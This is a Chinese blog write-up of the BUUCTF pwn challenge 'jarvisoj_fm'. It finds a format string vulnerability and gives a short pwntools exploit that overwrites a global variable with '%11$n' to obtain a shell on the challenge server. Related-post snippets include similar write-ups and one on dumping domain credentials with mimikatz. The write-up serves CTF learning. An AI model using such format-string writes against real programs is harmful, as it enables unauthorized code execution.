BUUCTF-jarvisoj_fm1-WP

最新推荐文章于 2024-04-30 22:07:29 发布

Rt1Text

最新推荐文章于 2024-04-30 22:07:29 发布

阅读量218

点赞数

分类专栏： BUUCTF 文章标签：安全 linux

本文链接：https://blog.csdn.net/arraylocalhost/article/details/127601147

版权

BUUCTF 专栏收录该内容

34 篇文章 1 订阅

订阅专栏

1.checksec

有canary ,题目提升fm,考虑格式化字符串

2.IDA

1.main

明显的格式化字符串漏洞

将x值赋为4就可以getshell

确定x的位置

参数在第11个位置

x的地址,然后编写脚本,挺简单的

3.EXP

#!/usr/bin/env python
from pwn import *
p=remote("node4.buuoj.cn",29539)
elf=ELF('./24fm')
x_addr=0x0804a02c
payload=p32(x_addr)+'%11$n'
p.sendline(payload)
p.interactive()

优惠劵

Rt1Text

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
BUUCTF-jarvisoj_fm1-WP

有canary ,题目提升fm,考虑格式化字符串。
复制链接

扫一扫

专栏目录

FM.zip_FM_FM matlab

09-23

FM的M文件,是基于MATALB环境下运行的

mb_bios_ga-b85m-d3v_v2.x_fm.zip

11-02

主板型号为：技嘉B85M-D3V rev2.0版本官方BIOS，已刷入NVME模块支持NVME SSD启动

参与评论您还未登录，请先登录后发表或查看评论

【CTF】jarvisoj_fm 1

凉水的博客

07-06

483

jarvisoj_fm

jarvisosoj_fm

xieyichensss的博客

05-07

127

乍一看像是一个格式化字符串漏洞，但是这种漏洞我不太明白，于是昨天晚上恶补了一下，对%n有了更确切的了解。思路：1.这题明显就是将x更改为4就可以获得shell，然后我查看到x的地址固定为0x804a02c，这个地址存放的数据为0x3。要让他变为0x4。 2.%n和%s一样，都要解析地址然后输出。%s是解析地址然后输出这个地址指向的内存数据，%n是解析地址，然后向次地址中填入之前打印字符的长度。（printf最后把格式化字符串的地址放入栈中，首先会把参数从右至左压入栈若没有参数，则会将栈上的内容作为参数输出

jarvisoj_fm

m0_52231248的博客

11-15

455

jarvisoj_fm Checksec： Ida：很明显的格式化字符串漏洞并且我们将x修改为4程序就会给我们调用system函数偏移gdb .%p都能确定，利用方式%$n，pwntools的fmstr模块都行可以看我之前写的pwn5 的wp有详细说 Exp： Flag： ...

JarvisOJ fm

PLpa的博客

07-09

1026

这一题是一道格式化字符串漏洞题关于格式化漏洞的基础，你可以看我前面的博客，里面有提到：https://blog.csdn.net/qq_43986365/article/details/94896862 拿到这一题，我们仍然是先查看保护：我们可以看到，简单的格式化漏洞题只开了NX和CANARY保护，好的。接下来我们就可以进入IDA中看一下程序的具体逻辑：在这里，我们可以看到有一个明显的...

[PWN] BUUCTF jarvisoj_fm

空城惜梦的博客

06-05

372

[PWN] BUUCTF jarvisoj_fm 按照惯例checksec ,开启了relro，canary,nx 执行程序，观察程序的逻辑，在打印出输入的字符后，会打印出3! 32IDA打开查看主要函数main，观察到在红框那里存在的很明显的格式化字符串漏洞，而且当x==4时，会得到flag，根据之前执行的程序可知，未修改x之前x的值为3，则若要修改x，需要利用格式化字符串漏洞的任意地址读写解题思路利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",

buuctf jarvisoj_fm

pondzhang的专栏

03-19

290

存在格式化字符串漏洞而实际上x的值为3 需要通过格式化字符串漏洞来重写x的值使用aaaa %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x测试格式化字符串漏洞长度格式化字符串的漏洞的任意写地址长度为11。可以使用$n来写地址中的数据。使用%11$n，意思将0x0804A02C的x地址写入32位大小的一个...

buuctf jarvisoj_fm

carol2358的博客

05-04

205

先运行， AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x 得出是第11位，然后p32(x_addr)正好变成4位 from pwn import * r = remote('node3.buuoj.cn', 27373) x_addr = 0x0804A02C p = flat([x_addr, '%1...

FM350-1_Getting_Start

03-16

FM350-1_Getting_Start.pdf 介绍了关于FM350-1_Getting_Start的详细说明，提供S7-300的技术资料的下载。

FMaPM.rar_FM PM_FM调制解调_PM-KB代码_fm解调_matlab fm pm

07-14

FM和PM的调制解调仿真源代码，已经调试通过。

FM-test.rar_FM_fm test

09-23

TEA5767收音机程序，希望能够对大家有一点用处啦

fm_vL-2016.03-SP1_linux64.spf

12-06

fm_vL-2016.03-SP1_linux64.spf

全新桥隧坡安全监测解决方案，24h监测效率提升30%

Hi_Target的博客

04-30

788

4月26日，交通运输部党组书记、部长李小鹏在部务会上强调，要高度重视公路桥梁隧道结构监测工作，抓紧推进公路桥梁隧道结构监测系统建设，进一步健全完善公路桥梁隧道结构监测长效运行机制。基于北斗高精度定位技术，采用高精度传感器，融合物联网、人工智能以及三维数字化仿真等技术，实时获取运营数据，掌握桥隧坡的运行状况，可有效减少维护成本，保障运营安全。具备振弦、电压、电流、差阻、RS485、RS232、开关量、继电器、RJ45接口。在全国各省份设有26家分公司，具备专业、高效的演示、演练、支撑、交付等本地化服务能力。

内网安全【1】——域信息收集/应用网络凭证/CS插件/Android/BloodHound

weixin_42090431的博客

04-28

904

因此，域中的计算机本地管理员账号，极有可能能够登陆域中较多的计算机，本地管理员的密码在服务器上后期修改的概率，远低于在个人办公电脑上的概率，而域用户权限是较低的，是无法在域成员主机上安装软件的，这将会发生下面的一幕:某个域用户需要使用viso软件进行绘图操作，于是联系网络管理员进行安装，网络管理员采用域管理员身份登录了域成员主机，并帮助其安装了viso软件，于是这个有计算机基础的员工，切换身份登录到了本地计算机的管理员，后执行mimikatz，从内存当中抓取了域管理员的密码，便成功的控制了整个域。

合规基线：让安全大检查更顺利

a38417的博客

04-29

1004

德迅基线产品还支持自定义基线功能，企业可根据实际的使用场景，自行定义基线的检查项，如定义检查阈值、自定义检查目录、自定义检查结果展现模板、自定义检查项整改方案等，以满足企业多样化的内部监管要求。但是在有限的安全人员、参差不齐的安全技术水平面前，迫切需要能够辅助安全检查与自评估的自动化、标准化的基线检查工具，并且能够支持多种类型的主机、数据库、应用系统等安全基线信息的采集与检测工作。，进行实时安全核查，快速发现安全配置变化，一旦发生安全配置变更异常，以邮件方式进行安全告警。相对于其他同等产品优势，

安全运维 -- splunk 操作手册

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交